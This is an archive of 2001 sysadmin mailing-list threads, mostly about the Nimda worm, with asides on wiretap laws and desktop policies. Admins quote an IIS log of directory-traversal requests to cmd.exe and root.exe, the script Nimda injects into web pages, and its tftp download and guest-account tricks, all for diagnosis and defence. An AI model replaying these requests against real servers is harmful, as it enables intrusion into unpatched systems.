Title: RE: Microsoft Has Nimda I think all John was trying to point out is that of all companies, MS should be more on top of all this crap than anyone, since all too often we're having to connect to them to get patches/fixes/etc to fix vulnerabilities in their products. Weren't the MS sites we were connecting to get the Code Red security patches infected themselves? Wasn't there a problem with the Microsoft/Frontpage site caused by Nimda? That's some serious negligence on Microsoft's part. -Original Message- From: Dillon, Jeff [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 1:29 PM To: NT System Admin Issues Subject: RE: Microsoft Has Nimda Operant Conditioning 101: behavior is controlled by its consequences, but most IT depts are skilled at dodging those consequences (which reinforces THAT behavior), so nothing changes/improves. The problem that management has is determining whether any given admin crime is worthy of the death sentence, since a firing impacts morale and often requires a new (expensive) hire. I see two places where improvement could be made: 1)upgrade the multitude of admins (not fast or easy or cheap), or 2)upgrade the product's ability to keep ITSELF patched (which is Microsoft's baby). There seems to be a certain efficiency in #2. -Original Message- From: John Hornbuckle [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 4:10 PM To: NT System Admin Issues Subject: RE: Microsoft Has Nimda Some mistakes are worse than others. The worse the mistake, the harsher the punishment. Sometimes people need to be fired. John Hornbuckle Network Manager Taylor County School District 318 North Clark Street Perry, FL 32347 -Original Message- From: Mal Sasalu [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 3:54 PM To: NT System Admin Issues Subject: RE: Microsoft Has Nimda If firing someone or cutting off somebody's head for any mistake was an answer, you'd have heard bombs by now! http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Help for the Nimda virus
Title: RE: Help for the Nimda virus Yo John - how come all your responses are blank. Or is just me. -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:18 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus -Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 1:03 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virus Very usefull tool. Thanks John. You're welcome! John -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:02 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus -Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 12:36 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virus I find it ironic that I had to use Explorer Search to find Searchit. Yes, there is a glitch in the installer program we used. It works fine on NT4.0 but on Win2k it appends the setup path to the exe's install path. It's fairly easy to set the searchit.exe path to c:\winnt\system32\searchit.exe and it will be fine. We'll get that fixed as soon as we get the fix for the installer. John Cesta -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:29 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus Mod the shortcut to point to the windows dir and it works fine. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 12:26 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virus We appreciate the thought, but the tool does not install properly. -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 8:14 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:54 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus It also doesn't work. I downloaded and installed it, and it didn't even create an executable. That's not true actually. 1. It is FREE a production copy. The link is right on the home page to the right of the dancing tools. 2. The search.exe file is in the c:\winnt\system32 directory. I didn't think it would be difficult to give something away. :0 John -Original Message- From: Givens, Mike [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:51 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus define free the link provided only goes to a trail version located in the downloads area ? -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:50 AM To: NT System Admin Issues Subject: Help for the Nimda virus Previous email contained an incorrectly formatted URL. Try this one. If any one is interested: We are giving away FREE our SearchIt program. SearchIt can search your logfiles, or any files, for text strings you define. You can search for cmd.exe or tftp or any other piece of a virus or IIS exploit. SearchIt may be run via a scheduler and a report of the found files is emailed to you. The FREE Download is at: http://www.serverautomationtools.com John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Help for the Nimda virus
Title: RE: Help for the Nimda virus Doh!!! I so rarely look down there unless someone responds "inline". Sorry -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 19, 2001 11:09 AMTo: NT System Admin IssuesSubject: RE: Help for the Nimda virus Yo John - how come all your responses are blank. Or is just me. Maybe because I am entering them under the question inline. John -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 19, 2001 1:57 PMTo: NT System Admin IssuesSubject: RE: Help for the Nimda virus Yo John - how come all your responses are blank. Or is just me. -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:18 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus -Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 1:03 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virusVery usefull tool. Thanks John. You're welcome! John -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:02 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus -Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 12:36 PMTo: NT System Admin Issues Subject: RE: Help for the Nimda virus I find it ironic that I had to use Explorer Search to find Searchit. Yes, there is a glitch in the installer program we used. It works fine on NT4.0 but on Win2k it appends the setup path to the exe's install path. It's fairly easy to set the searchit.exe path to c:\winnt\system32\searchit.exe and it will be fine. We'll get that fixed as soon as we get the fix for the installer. John Cesta-Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:29 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus Mod the shortcut to point to the windows dir and it works fine. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 12:26 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virus We appreciate the thought, but the tool does not install properly. -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 8:14 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:54 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus It also doesn't work. I downloaded and installed it, and it didn't even create an executable. That's not true actually. 1. It is FREE a production copy. The link is right on the home page to the right of the dancing tools. 2. The search.exe file is in the c:\winnt\system32 directory. I didn't think it would be difficult to give something away. :0 John -Original Message- From: Givens, Mike [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:51 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus define "free" the link provided only goes to a "trail" version located in the downloads area ? -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:50 AM To: NT System Admin Issues Subject: Help for the Nimda virus Previous email contained an incorrectly formatted URL. Try this one. If any one is interested: We are giving away FREE our SearchIt program. SearchIt can search your logfiles, or any files, for text strings
RE: .BHF
Title: RE: .BHF from symantec.com System Modifications When executed the worm determines from where it is being executed. The worm then overwrites MMC.EXE in the Windows Directory or creates a copy of itself in the Windows Temporary Directory. The worm then infects commonly used executables listed in the registry keys: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders The worm hooks the system by modifying the system.ini file as follows: Shell = explorer.exe load.exe -dontrunold It also replaces the file Riched20.dll. Riched20.dll is a legitimate Windows .DLL used by applications such as Microsoft Word. By replacing this DLL, the worm is executed each time applications such as Microsoft Word are executed. The worm copies itself as the file: %Windows\System%\load.exe NOTE: %Windows\System% is a variable. The worm locates the \Windows\System folder (by default this is C:\Windows\System) and copies itself to that location The worm then attempts to modify files with the extension .htm, .html., and .asp or filenames matching default, index, main and readme on the local system that are shared with other network computers. .EXE files are infected and .EML and .NWS files are replaced by the virus. Next, the worm creates open network shares for all drives on the computer by modifying the registry key: HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\[C$ - Z$] A reboot of the computer is required for these settings to take effect. The worm searches for all open shares on the network by iterating through the Network Neighborhood. All files on any open network shares are examined for possible infection. .EXE files are infected by the worm except WINZIP32.EXE. .EML and .NWS files are copied to the open network shares and the worm copies itself over as riched20.dll to any directory with .DOC files. During execution, the worm may attempt to delete copies of itself. If the file is in use or locked, the worm will create WININIT.INI with an entry to delete itself upon reboot. The worm contains bugs and can be resource intensive. Thus, not all actions may occur and system instability may be noticable. -Original Message- From: David Coffey [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 11:37 AM To: NT System Admin Issues Subject: .BHF Hi everyone, As most did we too got hit with the NIMDA virus. Has anyone experienced problems with Windows Explorer.exe after cleaning up your nt server? Also, I'm now getting a message at startup that says: Windows is searching for Connect from ouside.BHF. To locate the file yourself, click Browse. I can't find any information on this .bhf file and I am wondering if it's virus related. Lastly when I get the Dr. Watson for explorer.exe I also lose the Norton icon from the tray? Thanks, Dave http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Senate votes to permit warrantless Net-wiretaps, Carnivore us e
Title: RE: Senate votes to permit warrantless Net-wiretaps, Carnivore use As much as I don't necessarily have a problem with this, the real question will be what happens when someone makes an offhand, attempt-at-humor comment that sets off whatever filters they're looking for. Will my kid get put on a list because he's researching and chatting with friends about JFK's assasination and the phrase kill the president is in their conversation? -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 5:50 AM To: NT System Admin Issues Subject: RE: Senate votes to permit warrantless Net-wiretaps, Carnivore use Here here! -Original Message- From: Jerry Kennedy [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 5:53 AM To: NT System Admin Issues Subject: Re: Senate votes to permit warrantless Net-wiretaps, Carnivore use Write my Congressman about what? About implementing laws designed to protect us at the cost of a minor infringement on my civil rights? What are they doing that your employer or network admins, who could use benign e-mails in a much more malicious manner, don't already do. While I don't like it that we have go to these lengths, I feel it's necessary for our National Security. Besides, I've nothing to hide and if I had something to hide I would not be likely to send it via e-mail. Maybe, just maybe, if we had this in place a while back, some 6,000+ people, some of which may have even been on this list, would still be with us. It's a dangerous world out there, which requires unpleasant measures. GOD BLESS AMERICA. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: WARNING: Hacker Alert
Title: RE: WARNING: Hacker Alert How do you do that? -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 8:26 AM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert looks like an exploit of the Hacked by Chinese type from several months ago. None of my servers have shown attempts. One easy way to stop most of the IIS probing is to simply require host headers on all sites. If your server doesn't respond when the get/put commands use an IP number, then most vulnerabilities aren't vulnerable. Then any scans would need to be done via DNS rather than random IP numbers, significantly slowing attacks. -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 11:19 AM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert Here is a site that has been hit http://216.39.178.32 -Original Message- From: Jason Morris [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 7:59 AM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert CodeRed seems to have dwindled to nothing on my logs. But it's being replaced with the EXACT same lines you have below, and they stay consistent with the code red 2 methods of attacking the more local subnets. Jason Morris CCDA CCNP Network Administrator MJMC, Inc. 708-225-2350 [EMAIL PROTECTED] -Original Message- From: Jason Morris [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:50 AM To: NT System Admin Issues Cc: '[EMAIL PROTECTED]' Subject: RE: WARNING: Hacker Alert Yes. It seems to be systems I have previously monitored hitting me with codered attacks. I bet someone is activating all of their children. Jason Morris CCDA CCNP Network Administrator MJMC, Inc. 708-225-2350 [EMAIL PROTECTED] -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:45 AM To: NT System Admin Issues Subject: WARNING: Hacker Alert All my public facing web servers at home and at my office have shown a huge continuous hacking activity. Has anyone seen similar? I fear this may be code red related or automated. Please comment if you have seen similar. Here is an excerpt from one logfile: 63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe , /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe , /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET,
RE: FW: Worm probes
Title: RE: FW: Worm probes From Panda (note they won't have a sig file for a few hours yet): Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through the e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in Internet Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed. Due to this threat, Panda Software recommends to follow up the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with the additional info about the virus. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: Worm probes Here's one from a thread on nanog HTH, Geoff - Original Message - From: Jim Olsen [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, September 18, 2001 11:03 AM Subject: Re: FW: Worm probes This is the information i've collected thus far on W32.nimda: W32.nimda is NOT a code red variant, and the people who referring to it as Code Blue were mistaken... The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000 server's to infect a server, and also employ's email and web site mobile code to infect Windows 9x/ME/NT/2k boxes. During the initial infection of a server, the worm does the following: - download a file named admin.dll via tftp from the system that is trying to infect the target - add the guest account to the local administrators group and activates the account - makes sure c$ is shared out - copies itself to c, d, and e drives - tries to mail itself to email addresses that it discovers on the server - creates a file named readme.exe, which is used in the mobile code inserted on the web sites below - add this string to the web pages found on the server: htmlscript language=JavaScriptwindow.open(readme.eml, null, resizable=no,top=6000,left=6000)/script/html - scans for and infects other vulnerable IIS servers - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above. - goes through all shared directories and puts riched20.dll in each directory, which is a trogan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory. - puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above readme.exe format (win2000 only) If a user views a web site that is hosted on an infected server, the following happens: - upon viewing an infected page, the mobile code extracts to readme.exe and starts in windows media player (without user intervention) - the user's machine becomes infected with W32.nimda at this point and time - the worm starts scanning for other vulnerable IIS servers - the worm emails itself to everyone on the user's address book - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above. - goes through all shared directories and puts riched20.dll in each directory, which is a trogjan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory. - puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above readme.exe format (win2000 only) It us unknown to me what happens (at this point in time) if a user opens an attachment that is sent from an infected site. It is possible that it could automatically infect the user's computer using the same methods mentioned above. EVERYONE who uses internet explorer to browse the internet should probably do one of two things to stop from being automatically infected by W32.nimda (i have not tested whether or not turning off javascript fixes the problem): o) don't browse web pages until microsoft releases a patch o) turn OFF javascript EVERYONE who uses outlook/outlook express should, at the very least, not open any attachments that they are not expecting. Turning off auto-preview
RE: FW: Worm probes
Title: RE: FW: Worm probes reg hack to not execute perhaps? -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 12:57 PMTo: NT System Admin IssuesSubject: RE: FW: Worm probes -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 3:26 PMTo: NT System Admin IssuesSubject: RE: FW: Worm probes From Panda (note they won't have a sig file for a few hours yet): Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through the e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in Internet Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed. I am not so sure thatthis assessment is entirely correct. For example, in my situation, I have a PC with Outlook2000 and preview mode enabled. What I get is that when I click on the email a dialog box opens and prompts whether or not Iwish to save the file to disk - the README.EXE file that is.I just click cancel and then delete the email. I do not contract the virus. John Due to this threat, Panda Software recommends to follow up the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with the additional info about the virus. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: Worm probes Here's one from a thread on nanog HTH, Geoff - Original Message - From: "Jim Olsen" [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, September 18, 2001 11:03 AM Subject: Re: FW: Worm probes This is the information i've collected thus far on W32.nimda: W32.nimda is NOT a code red variant, and the people who referring to it as "Code Blue" were mistaken... The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000 server's to infect a server, and also employ's email and web site mobile code to infect Windows 9x/ME/NT/2k boxes. During the initial infection of a server, the worm does the following: - download a file named "admin.dll" via tftp from the system that is trying to infect the target - add the guest account to the local administrators group and activates the account - makes sure c$ is shared out - copies itself to c, d, and e drives - tries to mail itself to email addresses that it discovers on the server - creates a file named readme.exe, which is used in the mobile code inserted on the web sites below - add this string to the web pages found on the server: htmlscript language="JavaScript"window.open("readme.eml", null, "resizable=no,top=6000,left=6000")/script/html - scans for and infects other vulnerable IIS servers - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above. - goes through all shared directories and puts riched20.dll in each directory, which is a trogan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory. - puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above "readme.exe" format (win2000 only) If a user views a web site that is hosted on an infected server, the following happens: - upon viewing an infected page, the mobile code extracts to readme.exe and starts in windows media player (without user intervention) - the user's machine becomes infected with W32.nimda at this point and time - the worm starts scanning for other vulnerable IIS servers - the worm emails itself to everyone on the user's address book - goes through all shared directories and puts
RE: FW: Worm probes
Title: RE: FW: Worm probes Name: Nimda Alias: W32/Nimda Virus Categories: WORM (E-MAIL) Virus Families: W32 GROUP Repairable: Yes Date of Appearance: 09/18/2001 Included in the "Wild List": No Activation Condition Basic Information: W32/Nimda is a worm that spreads by e-mail and exploits a vulnerability in Windows98 and Windows2000 that makes it possible to run Audio/X-wav files through Windows Explorer. To ensure its propagation, this worm sends out a message that includes an attachment with the following name: README.EXE. This file pretends to be an Audio/Xwav file coded in Base64 format. After being decoded, the executable file that contains the worm is 57344 bytes long. One of the actions carried out by this worm consists of sharing the drive C: of the affected computer in order to spread to other network drives. Means of Propagation This worm uses e-mail to spread to other systems. To do this it sends out messages containing an attachment with the following name: README.EXE. Symptoms of Infection This worm creates several files in the Windows temporary directory. Although the content of these files is basically very similar to the original file, it does present certain variations. Additionally, it creates a file called Wininit.ini in the Windows directory. The worm is coded to download a file called Admin.dll. To do this it uses an application called Tftp.exe. Finally, the worm creates a new user through which it shares the C drive and attempts to spread to other network drives. Additionally, it exploits a vulnerability in Windows98 and Windows2000 that makes it possible to run Audio/X-wav files through Windows Explorer. -Original Message-From: Ray Zorz Sent: Tuesday, September 18, 2001 12:58 PMTo: NT System Admin IssuesSubject: RE: FW: Worm probes reg hack to not execute perhaps? -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 12:57 PMTo: NT System Admin IssuesSubject: RE: FW: Worm probes -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 3:26 PMTo: NT System Admin IssuesSubject: RE: FW: Worm probes From Panda (note they won't have a sig file for a few hours yet): Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through the e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in Internet Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed. I am not so sure thatthis assessment is entirely correct. For example, in my situation, I have a PC with Outlook2000 and preview mode enabled. What I get is that when I click on the email a dialog box opens and prompts whether or not Iwish to save the file to disk - the README.EXE file that is.I just click cancel and then delete the email. I do not contract the virus. John Due to this threat, Panda Software recommends to follow up the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with the additional info about the virus. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: Worm probes Here's one from a thread on nanog HTH, Geoff - Original Message - From: "Jim Olsen" [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, September 18, 2001 11:03 AM Subject: Re: FW: Worm probes This is the information i've collected thus far on W32.nimda: W32.nimda is NOT a code red variant, and the people who referring to it as "Code Blue" were mistaken... The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000 server's to infect a server, and also employ's email and web site mobile code to infect Windows 9x/ME/NT/2k
RE: Splash screens and wallpaper
Title: RE: Splash screens and wallpaper not sure about the splash screen. Wallpaper can done with policies. -Original Message- From: Dan Munley [mailto:[EMAIL PROTECTED]] Sent: Monday, September 17, 2001 1:06 PM To: NT System Admin Issues Subject: Splash screens and wallpaper I have been asked to do two things. 1. Present a splash screen that everyone will see for 5 or 10 seconds during the logon or boot. 2. Change everyone's desktop wallpaper to some uniform graphic. I am looking for suggestions and would appreciate any help. I have previously created mandatory wallpaper using the registry editor and logon scripts. Thanks, Dan Munley http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: The idiocy continues!
Title: RE: The idiocy continues! He's not saying that everyone doesn't deserve the rights, only that the Constitution is for U.S. citizens. We have no jurisdiction outside of our borders, although part of the reason many other governments fear/hate/whatever the US is we think we should impose our Constitutional principles on their people too. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 13, 2001 10:54 AM To: NT System Admin Issues Subject: RE: The idiocy continues! I apologize for adding to this thread but I could not help myself. Saying that someone who lives outside of our country does not deserve the same basic rights they we enjoy is pretty much off the mark. If I remember correctly our Constitution says all men are created equal. Every man, woman, and child should be treated like a human being, no matter their country of origin. Now, I am not saying be nice or even be civil to scum that masterminded the attacks in NYC. Personally I would like to see the SOB's head on a pike in Central Park. All this is my humble opinion. --Dan -Original Message- From: Puckett, Matt [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 13, 2001 10:22 AM To: NT System Admin Issues Subject: RE: The idiocy continues! But lets remember that these rights are for americans only(no offense) and should not be used to protect the guilty hiding in other countries. They are not subject to our rights therefore no need for a trial. Matthew Puckett MCSE, MCP+Internet, MCP Customer Support Analyst Sprint PCS IT Service Delivery Bristol Customer Care Center 1-423-967-3086 - PCS -Original Message- From: Benjamin Scott [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 13, 2001 1:09 PM To: NT System Admin Issues Subject: RE: The idiocy continues! On Thu, 13 Sep 2001, Stuart Tonge wrote: What kind of civil liberties? For those outside the US, who may not be familiar with our government, here is a bit of a crash course: The foundation of our (i.e., the United States of America) government is our Constitution. The first ten Amendments to same are called The Bill of Rights, and specifically address certain freedoms our government is not allowed to restrict. An online copy is here: http://www.nara.gov/exhall/charters/billrights/billrights.html These form such a cornerstone of our political culture that all you have to do is mention the First Amendment and people will know you are talking about 